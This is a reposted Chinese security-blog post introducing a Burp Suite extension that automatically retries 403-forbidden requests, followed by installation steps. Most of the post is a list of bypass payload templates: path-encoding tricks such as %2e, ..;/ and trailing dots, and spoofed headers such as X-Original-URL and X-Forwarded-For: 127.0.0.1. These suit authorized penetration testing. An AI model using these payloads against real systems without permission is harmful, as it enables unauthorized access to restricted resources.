Burpsuite扩展绕过403受限目录

admin 2022年8月27日14:54:05安全工具评论14 views768字阅读2分33秒阅读模式

一个burpsuite扩展,用于绕过403受限制的目录。通过使用PassiveScan(默认启用),此扩展将自动扫描每个403请求,因此只需添加到burpsuite中即可。

下载链接:sting8k/BurpSuite_403Bypasser

payloads:$ 1:HOSTNAME $ 2:PATH

$1/$2
$1/%2e/$2
$1/$2/.
$1//$2//
$1/./$2/./
$1/$2anything -H "X-Original-URL: /$2"
$1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1"
$1 -H "X-Rewrite-URL: /$2"
$1/$2 -H "Referer: /$2"
$1/$2 -H "X-Originating-IP: 127.0.0.1"
$1/$2 -H "X-Forwarded-For: 127.0.0.1"
$1/$2 -H "X-Remote-IP: 127.0.0.1"
$1/$2 -H "X-Client-IP: 127.0.0.1"
$1/$2 -H "X-Host: 127.0.0.1"
$1/$2 -H "X-Forwarded-Host: 127.0.0.1"
$1/$2%20/
$1/%20$2%20/
$1/$2?
$1/$2???
$1/$2//
$1/$2/
$1/$2/.randomstring
$1/$2..;/

安装

BurpSuite -> Extender

-> Extensions

-> Add

-> Extension Type: Python

-> Select file: 403bypasser.py

-> Next till Finish

Burpsuite扩展绕过403受限目录

文章转自https://zhuanlan.zhihu.com/p/337867355
侵权联系删除

扫码进交流群

Burpsuite扩展绕过403受限目录

原文始发于微信公众号(菜鸟学安全):Burpsuite扩展绕过403受限目录

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月27日14:54:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Burpsuite扩展绕过403受限目录 http://cn-sec.com/archives/1258090.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: